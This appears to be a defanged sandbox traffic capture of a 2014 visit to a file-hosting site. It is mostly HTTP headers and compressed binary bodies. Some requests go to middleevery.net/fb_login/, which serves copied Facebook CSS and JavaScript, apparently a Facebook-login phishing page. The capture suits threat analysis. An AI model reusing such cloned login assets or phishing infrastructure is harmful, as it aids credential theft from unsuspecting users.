Content-Type: application/x-javascript; charset=utf-8

Timing-Allow-Origin: *

Content-Encoding: gzip

Content-MD5: YDYtMDo5BiGKdWAidVv7Nw==

X-FB-Debug: liwqYrYBPa75LLtIadkW1ZABvIl7wQurY1yoMd3OU6I=

Content-Length: 53567

Cache-Control: public, max-age=1200

Expires: Fri, 30 May 2014 16:16:12 GMT

Date: Fri, 30 May 2014 15:56:12 GMT

Connection: keep-alive

Vary: Accept-Encoding
............k{.H.7...O.=3.jd..:B.|.q.v..[U=.3..%@.q.F`......_Df*%.....
.......cddddddD..O..j...<>z..;|.......c.??|/..'.|....xR/]..=y...
..'._..t...q..O.Q...M...............I.JY..%...$....n8 ..a..4..........
..tT..F.>...............HJ'..|x....w.R..?..eiu.M..U....z]*./&.tY...
.?..Y).G.%.$.^..w..p27IU..P....q./..i.....y8..F..:....`....*E6[.$7.L..
...[-*Rk..._).O...z.4.[......Z4...7....,./f.R...5n.T.0.......h.z.V..b.
."...n.....M.7......U'.z......&...,..8..F(.^O..<[email protected]............
...,..............Td.]P.u.u..b4j.....4..J.f.xVv>2.%..V...P...R;.'.n
x.M...6n1.........v.i.E~.:.'.y..xC.y.8..Pr.....QcT....*.w..~st..:AB]..
..~......!.............d.5.)C}.e........alI>!"X..i.j'...(.......t..
....U...<.-i.NG.r....f.....4.........<...4........w...W..z......
N<..s.sO.\_...<.........q8.......[........w.}{.j6..DV....z.3/].^
..x].)U..Va.:...p.^d...c.%....-T....Y..Mf#....2...6 R...6*..K..J......
.3"[email protected]....!Q.G#bL.........5$..m.j%.............!
!.V.q.0...l.............M.@..[.C^......8v...Z4....&v....Y.=7d..xl...7@
[email protected]....^.......F.b....H.....ytF ..;.t....m......um
......\.m..5.....^.;....x.`7)..$......z<A........S.f5..#..f=.L.....
._.....)fK{....i.u.ww.d:.....7....Vw*..N_.....:[email protected]....,....J.. ....
.M.J..7W........3%.E..y. ....B...&.5K...V-..1lT...#.Y.....&.5....=....
.<.h..Es...8"_.U....?m..Q.J4.......O.q;....<<s..D.O.'..].e...
..y.:.&e.......z.j.  ....F.w...>......?........&...9z0..).F..V.f..X
..K.......a....q.......:Q.....p7a.."...$.`Q?.(.........!.;.c.g....
<<< skipped >>>

GET /ga.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google-analytics.com

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 13:06:01 GMT

Expires: Sat, 31 May 2014 01:06:01 GMT

Last-Modified: Thu, 08 May 2014 18:54:47 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 15790

Age: 10211

Cache-Control: public, max-age=43200

Alternate-Protocol: 80:quic
...........}kw.:[email protected].,.iH.....$...3#......s.z7.
.<..e4....x2.Y/.....>^.<.C.D......j...0c!...qo.....A*....L&..
x.K..w.*8..%.<..|..)d.X.......&..*... .Q...(.....8..q..\.!...a..0..
.$.tX..N&..a?!..zB:l.8c9.p.....;l..x.$c.]AP\..>..B...&..:pz.H......
..g...Ap..!.5..K......V;l.H.....V.a.....s.$p......39...a.a.P'9.b.;H>
;N.$..A..... ..^..{h.h...2l_..N...w9..d.@.`._.N..7..|....%.d.%......%.
{[email protected]..:....F.{..c.nzP*..a..LzP.sl...V..y.U8*&.......}[email protected]..
.Ty. u.Y...!..R.h.V..h./>3...*.P..(..:A.}..v.C ..M..Vk.......\..d..
..he.q..u.u..yE./J.Re..|:u..L...B..E..Tn/v \.<...8..MU.g.....{.`..}
.;n.....x................4...kG..[q....0r7.....l.n?..@|.%W.g....V..../
.a......P`....t W.VNq.#.......}.WL....,X.a....{..*..!<W.......e.{.$
.e......[......S....(.).K..........>....X5o{i&.X..A.F.T"h.....KB...
^]..f..z3.jyYcy......@..#Y*.z.Jl.#w...S...^..a..A..F....q.!...6~...1..
..P.......`..= .M.(.^[email protected].".v.........L...R.....[...fx....o..
.K...s..!..........oa.F..V......)..ym...;......a..r..N. ....Y.5o.u|..K
...}l[i.....N.-%...4.I..(..'.....PR..gnAx...A.D.....w..5W..m. .....Zno
........d<hpf...s.e#..v...p..g...[.G.k.2.c.6.....5..Lcc.fUm/.P!....
!U.c.......d78!7.......V>&."..Q$.....&.sS..Kq....].UySz=..3..$.".;.
.".'.Kar\[...t\....;...h._.O..b...2....{[email protected])2!..xD7...T..Di.w.R
C`.m.8.\....J....h..u{{.....p..)..O3.W.........k...y.`^ ....&1..f"..D.
W.}.;D:d.F....p#... ......d...T..iU7n.;-hh..T..^P....U.....>...T..m
....fC....>..>d..Q..!....X1......7L...[.........;.w...[L.LB.
<<< skipped >>>

GET /__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=VVV.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google-analytics.com

HTTP/1.1 200 OK

Pragma: no-cache

Expires: Wed, 19 Apr 2000 11:43:00 GMT

Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Date: Thu, 29 May 2014 01:06:01 GMT

Server: Golfe2

Content-Length: 35

Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate

Age: 139811

Alternate-Protocol: 80:quic
GIF89a.............,...........D..;..

GET /fb_login/index_files/QzuAG9bQwbS.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 280389

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364593181,173213727*/...fbEmuTracking{position:absolute;visibility:
hidden}..tinyViewport div._22r, div._22r{position:fixed !important;rig
ht:-300px !important;width:244px}..tinyViewport ._22q div._22r, ._22q 
div._22r{width:122px}.div._22q #pagelet_rhc_footer{display:none}.div._
22q .ego_column, div._22q{width:122px;z-index:1}.div._22q .image_body_
block{padding-top:0}.div._22q .fbEmuImage{float:none}.div._22t .uiSide
Header{background:none;border-bottom:1px solid #c8d1e2;border-top:0;pa
dding:4px;margin-bottom:0}.div._22t .ego_unit{margin-bottom:7px;paddin
g-top:3px;border-color:#c8d1e2}.div._22t div.ego_section > div{padd
ing-left:0;padding-right:0}.._22t .uiSideHeader h4{color:gray;font-wei
ght:normal}.._22q a.uiHeaderActions{display:none}.._22s{bottom:auto;to
p:50px}..timelineLayout ._22t{bottom:15px;padding-top:12px}..pagesTime
lineLayout ._22t{padding-top:51px}.._3nl ._22t{padding-top:0;width:315
px}.._3ms_ ._22t{padding-top:0}..permalinkBody ._22t .uiBlingBox{borde
r-bottom:none}.button.async_saving .default_message,.a.async_saving .d
efault_message,.form.async_saving .default_message,..saving_message{di
splay:none}..default_message,.button.async_saving .saving_message,.a.a
sync_saving .saving_message,.form.async_saving .saving_message{display
:inline}..async_throbber .async_saving{background:url(hXXps://fbstatic
-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif) no-repeat right;padd
ing-right:20px}..async_throbber_left .async_saving{background:url(http
s://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif) no-r
<<< skipped >>>

GET /_js/global.js?ver=d10 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 66902

Last-Modified: Mon, 03 Feb 2014 21:56:14 GMT

Connection: keep-alive

ETag: "52f0107e-10556"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
var globalMouseX;.var globalMouseY;.$(document).ready(..function()..{.
..if ((navigator.platform.indexOf("iPhone") != -1) || (navigator.platf
orm.indexOf("iPod") != -1))...{....$("input:file").parent().append("Up
load is not supported by your device!");....$("input:file").hide();...
.$(".upbutton").hide();...}...makeDraggables();...$('.gbutton').click(
function(event)...{....event.stopPropagation();...});...$('#tools_menu
').click(function(event)...{....event.stopPropagation();...});....wind
ow.page=2;...$(window).scroll(function()...{....if($(window).scrollTop
()   200 >= $(document).height() - $(window).height())....{.....nex
tPage(false);....}....if($(window).scrollTop()>=195)....{.....$("#h
ome_member_filesmenu").css({position:'fixed', top:0});.....$("#home_me
mber_filesmenu_ph").css('height', $("#home_member_filesmenu").css('hei
ght'));....}....else....{.....$("#home_member_filesmenu").css({positio
n:'relative', top:''});.....$("#home_member_filesmenu_ph").css('height
', '0px');....}...});....$("body").mousemove(....function(e)....{.....
globalMouseX = e.pageX;.....globalMouseY = e.pageY;....}...);...//GT C
LIENT PAGE...$('.collapsible').children().hide();...$('.collapsible').
click(....function(e)....{.....if ($(this).children().css('display') =
= 'block').....{......$(this).children().hide();......$(this).css('bac
kground-image', 'url(/_images/ico_expand.png)');.....}.....else.....{.
.....$(this).children().show();......$(this).css('background-image', '
url(/_images/ico_collapse.png)');.....}....}...);...$('#home_membe
<<< skipped >>>

GET /_images/ajax-loader.gif HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/gif

Content-Length: 673

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-2a1"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
GIF89a................BBB...bbb......!..Created with ajaxload.info.!..
.....!..NETSCAPE2.0.....,..........3....0.Ik.c.:....N.f.E.1.......`..q
.-[.9...9...Jk.H..!.......,..........4....N.! .......DqBQT`1. `LE[..|.
.u..a... ....C..%$*..!.......,..........6..2# .A....V/..c....N.IBa..p.
........ .Y.......2.d.....!.......,..........3..b% .2....V_.....!..1D.
a...F.....bR].=.08,....r9L..!.......,..........2..r' J.d....L..&v.`\bT
.....hYB)..@....<..&,....R...!.......,..........3.. ..9..t....0....
!.B...W..1....sa..5....0.....m)J..!.......,..........2.........U]....q
p.`..a..4..AF.0..`[email protected].......!.......,..........2....0.I.eB..)..
... ..q..10....P..a..V... ub...[....;.............


GET /_images/header_sync.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1395

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-573"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e&
lt;....IDATx..WMLcU.>..............%......d.GL&C....A.1&.........DW
.b......G...I.F.J.v(.8.Bi..2...{.{)."..&..$.........|..[F.E8Ma.......S
. !?..-......CL3.....z .6.....~{.......PWT.B&...%m.....J?.IX]...."....
..*.j=.. :.69A..@....{....}.e.......u56.\...A>..t:}u9......$..z...P
t.<j..6......Z.Z...D.,.. ...f.W....O...]F...........k2...N6.</Z.
&..CJD*...e2.U..8>6...w..|...<[email protected].\J....EKZ.BA...~......
.<.#[email protected].|O...P.)(....y..y.>S.h_..W
......=...!...N...............@. =...v........^...L.....555.mmm4...hv.
[L5.-.s..o.........0..uwuM.y5....:O$.............*q.....b.....twwS....
..1.x.G7..A4.{......[..&.CNB.. ....Xl..N'.V. . ?,...p..;..r.t...9...K.
S.....o.g..T8..06<|.n1:Xt\`2..P.3.G.S......oQ..\..v?r,..B..Ws.P....
..E.#....n.79d.n...;Y../.......T.......q..........T*....B...z.|..Mp..#
J...!..-).E.(......!..*.%S)..0%....0..88....i.`.....s.Q..F......q.....
<;<...-.DB....p..F#D#.8..HA>...1V*c!...u...%....8.L."...y..A.
.z...C2..[1........W...`.Y..8Ga.l.&.0..&..G*5..........; B.),.t..=.E..
!.F....t...^|v.jx..ggKl..$.)...h<....b%............hd.j.....%......
%..Y...d..o.........E*.J...G......D......"@r-....z..f$.."'.....x.u_...
.].t.D..4....b.2.L......l.........y<.....Mx...r/..z....B~.[7.f..l..
...?.s.$...VVV.VWW.H.#V9..,..._D....]UU.1.. x.D.SI.d..3.P..j.kh"...Pn.
.KLz......Z~...........HQ..B....IEND.B`...
<<< skipped >>>

GET /fb_login/index_files/tjP47PMhke1.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 20579

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364175991,173217823*/..if (self.CavalryLogger) { CavalryLogger.star
t_js(["fKd4 "]); }..__d("NotificationURI",["URI"],function(a,b,c,d,e,f
){var g=b('URI'),h={localize:function(i){i=g(i);if(!i.isFacebookURI())
return i.toString();var j=i.getSubdomain();return i.getUnqualifiedURI(
).getQualifiedURI().setSubdomain(j).toString();},snowliftable:function
(i){if(!i)return false;i=g(i);return i.isFacebookURI()&&i.getQueryData
().hasOwnProperty('fbid');}};e.exports=h;});.__d("DoublyLinkedListMap"
,["copyProperties"],function(a,b,c,d,e,f){var g=b('copyProperties');fu
nction h(){this._head=null;this._tail=null;this._nodes={};this._nodeCo
unt=0;}g(h.prototype,{get:function(i){return this._nodes[i]?this._node
s[i].data:null;},_insert:function(i,j,k,l){k&&!this._nodes[k]&&(k=null
);var m=(k&&this._nodes[k])||(l?this._head:this._tail),n={data:j,key:i
,next:null,prev:null};if(m){this.remove(i);if(l){n.prev=m.prev;m.prev&
&(m.prev.next=n);m.prev=n;n.next=m;}else{n.next=m.next;m.next&&(m.next
.prev=n);m.next=n;n.prev=m;}}n.prev===null&&(this._head=n);n.next===nu
ll&&(this._tail=n);this._nodes[i]=n;this._nodeCount  ;return this;},in
sertBefore:function(i,j,k){return this._insert(i,j,k,true);},insertAft
er:function(i,j,k){return this._insert(i,j,k,false);},prepend:function
(i,j){return this.insertBefore(i,j,this._head&&this._head.key);},appen
d:function(i,j){return this.insertAfter(i,j,this._tail&&this._tail.key
);},remove:function(i){var j=this._nodes[i];if(j){var k=j.next,l=j.pre
v;k&&(k.prev=l);l&&(l.next=k);this._head===j&&(this._head=k);this.
<<< skipped >>>

GET /fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 522

Content-Type: image/gif

Age: 0

Connection: close

Server: YTS/1.20.28
GIF89a.............p....................Ro...................!..NETSCA
PE2.0.....!.......,.......... ..I....e....)."-...%..g..i..tio..~..0...
....!.......,...........P.$........wIT..!.......,..........2..)R.s.s.L
..d.A......."..)...Y.lF.......y.M.(.U....!.......,..........>..I.HI
T...R. .P..t....I1.....H.....Y....`.a....}L....&6..u..d".!.......,....
......=..I....`.2.P..t...(."..P.....,..........w........OhTJ.........!
.......,..........3..I....e...P...(.d.R1...2r...\3...=.....>..24.`.
.J..!.......,.............%.......T..;..

GET /ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google.ca

HTTP/1.1 200 OK

Content-Type: image/gif

Date: Fri, 30 May 2014 15:56:13 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate

X-Content-Type-Options: nosniff

Server: adclick_server

Content-Length: 42

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic
GIF89a.............!.......,...........D.;..

GET / HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; path=/

Expires: Fri, 30 May 2014 15:56:10 GMT

Cache-Control: no-cache

Pragma: no-cache

Set-Cookie: landing_url=/; expires=Sun, 29-Jun-2014 15:56:11 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

X-Frame-Options: DENY
1208.............;is....._.sfG..$J>.X.4k.r.}..c..K.X .Q.).....M..v.
 EJ.egv.6U.(.......p..jp.?.C2N&~..!~.....=c.$a.4..ik....gv....'.1.o6..
....q8a.%..d....g.D.. i..Bf.G}...{[email protected]<.O|.?.>...
..........%8.7.i..|&.E...k../R..&"..;4..D....$......A"...8...1c.A.....
........-x.....kH.`....g>"~B.....\|.D<[email protected]
........E1......m....y6|.....CS.BR..Y....f...........e...e..// lZ_c...
).fK.^7.....p4...w.....6..`.,........b...y..)}@..i,......0.!..Y..^7...
.:).x.{..TL..p...B.......%.c..d ..j.#.K...n.cg{.o.........w...M...m...
w{.>........nFB$.|.....)BlLy..`.>.g.s.....(...,... ..?...-.o....
p~.B..-p\[email protected][email protected]
|q. .M....#.....i...o.......rv.-g.."o.....Y...Z..xPk.e..8.A..,.06.(.o.
........;>a"M..../...[..!3.....ik..y=...zz4.._].c...s=.......8.Q.. 
.s....syr.".E....z...iD... .t.l(.C...zM.TM....9.<j#....b......G..?I
.4....$...V...........]S.r<.K4...3.^.~P.j..B.......^b}K>.C.~.Y:.
1...y0!.`[email protected];[email protected]...]|.3......6~
.......{...x.H..).E7..z.;0$P'..4.E.`....^mR......Oc({dP.(..vg..*.n ../
.#.Uc.S,.n.P....,....b......9.g>....y.a..Mx:)...^...p.".#g."...CH..
<...c.S..J...#.M.f..!.O...q..<.8K1.....1..V8....},........C.d.4.
.6c...J31....~.l....vdf.<..b.6.JR..*{)...5.e}.ip.Y..Y..A.S../c .. .
..x..,.q1.e..A..#"x`3.. [email protected].<..)c...Ml
.......P........k.DT.........^......w...........8.....Hrs.p. .\#w@.,:.
f..... ......9I...Gx..B.$s.............?..$.._. Q....M.........f.[
<<< skipped >>>

GET /_css/global.css?v=54 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: text/css

Last-Modified: Thu, 12 Dec 2013 18:00:10 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Content-Encoding: gzip
1d53.............=ko.F..._A..4Im.oQ6......&M.....X....o)Q..8i..~......
.Y\.Qe.s.....3gfV.....ggUT....s.'..:mo.....x.l.<.6.../G.&.D.X_...i.
.=..p.f......s/....e...O..m..'.t.;..mU^..,................~.No....~.b.
~.^.M...by{...>.h..'.Y]m~[..Ou........^.L.......E..iW5..M..Uew....m
.........C.J..-......_......k..y....1pP....>M..vs........f{..O.i[.}
w.\W..O.{...k6.^z..b4N.v.t#.BU..n[[email protected]].M...1..o../...w...sB..*...
so....@.;.%.\8u.u...4......... .@ vM]...,...C.....%.d~$Dl........91z..
;.q.w.o...H.s..ST.G.^...bw.O.eb.C..v1t.}"w"..u¢.e.~.__%....#.....;]6
..5../#..1......>[email protected].?..u &..c....O.$.9y..C\.....cH.P...
..N.Q.......#..h.}....p...o.._....!.....B.@h .K|..].w....3.^L..X.0.`..
..u.}.w...<&..M...?..raO)...}.t ?.....8..C..@:< .&..!]..:...~4.X
y..p.....R.....3B.....h.......:..(.f..../\...R..$.I .....!...........)
iq.>&.x.>F.7`.`....Cu..bn.#..$. !.\^^R.......z".#....[....H.i^..
]..^..e].Ok.-.O.G.\.@.,).rz!..N.......z....Bv...N.....Z..?b"Iz.....z.0
P..:..{.E..q..\",...-...o....sc)u..V........b..A..<.............]..
...r2....A..3......&....).$G6.GIt3(._....m..)..5.of.eH3.*...7.=K..d...
/.<.`..p~...............G......d......i.B..._......n4..p..u. 8P....
....k.....T_..G.?/.v.ay.......=.O.H.Z....m..Q..2...>.....i .4..|.6.
.Y....E......I....J.A.$.........C!..d.b..M[.5..#...:..4....5.}.`.#<
.q.l\.>........J..'.".oAr..g.....ms.u:`..................*.[..g....
.........7]U...m...{...,.r._0o..i...N`.E..?.0....W1..#...b..).Z....$&g
t;.P......q.O&{........j...)...~..i......A..uM^.E..~.......A!.....
<<< skipped >>>

GET /ext/swfupload/swfupload.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 37706

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-934a"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
/**. * SWFUpload: hXXp://VVV.swfupload.org, hXXp://swfupload.googlecod
e.com. *. * mmSWFUpload 1.0: Flash upload dialog - hXXp://profandesign
.se/swfupload/,  hXXp://VVV.vinterwebb.se/. *. * SWFUpload is (c) 2006
-2007 Lars Huring, Olov Nilz.n and Mammon Media and is released under 
the MIT License:. * hXXp://VVV.opensource.org/licenses/mit-license.php
. *. * SWFUpload 2 is (c) 2007-2008 Jake Roberts and is released under
 the MIT License:. * hXXp://VVV.opensource.org/licenses/mit-license.ph
p. *. */.../* ******************* */./* Constructor & Init  */./* ****
*************** */.var SWFUpload;..if (SWFUpload == undefined) {..SWFU
pload = function (settings) {...this.initSWFUpload(settings);..};.}..S
WFUpload.prototype.initSWFUpload = function (settings) {..try {...this
.customSettings = {};.// A container where developers can place their 
own settings associated with this instance....this.settings = settings
;...this.eventQueue = [];...this.movieName = "SWFUpload_"   SWFUpload.
movieCount  ;...this.movieElement = null;.....// Setup global control 
tracking...SWFUpload.instances[this.movieName] = this;....// Load the 
settings.  Load the Flash movie....this.initSettings();...this.loadFla
sh();...this.displayDebugInfo();..} catch (ex) {...delete SWFUpload.in
stances[this.movieName];...throw ex;..}.};../* *************** */./* S
tatic Members  */./* *************** */.SWFUpload.instances = {};.SWFU
pload.movieCount = 0;.SWFUpload.version = "2.2.0 2009-03-25";.SWFUploa
d.QUEUE_ERROR = {..QUEUE_LIMIT_EXCEEDED.  ..: -100,..FILE_EXCEEDS_
<<< skipped >>>

GET /_images/footer_bg.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 702

Last-Modified: Fri, 14 Sep 2012 15:15:38 GMT

Connection: keep-alive

ETag: "50534a1a-2be"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR...9..........Y.b....tEXtSoftware.Adobe ImageReadyq.e&
lt;...`IDATx....r.0.D.l.....U,.....t...=.$.4K......8..v.]...8..G.....|
n6..Y~.#.2g.)'s..="..H.....q ...2...J.'....]........P.....\'Z.Ib.....A
&:A`.#"..z.......%.n..J....:..`..1...9.7.s........d_...M...4.,.;2.?..J
....a...T.|.7bo.p.h[...2....6a.V....8.N.i..<*....`..z.b>.t...H9e
~8..gH`F.E..w.dP$F..X|....Q ]2.Gk..,.Vs K.....-9 /..pv.l....,.)L....Q.
..v.&....c.Q..gg.f3.?(y.T...J....%.O.Va.'...^.V.:...4.....R.>..f...
e.u..-4.gK./..pK...ln.j?...w.z...P\.[$.U...-v(...|.(.$.5ony...[.-3..-*
..[? ..%.f3..`..~v..}........o..[.....H...:..}k.. .s.[."T...{..&}.i6..
....[..4{X.I..'{pb.o..f.i.....[<F.-.....Rv......E.s.K.7$&..o..`..-i
o.0UQ....IEND.B`.....


GET /_images/contact_support.png HTTP/1.1

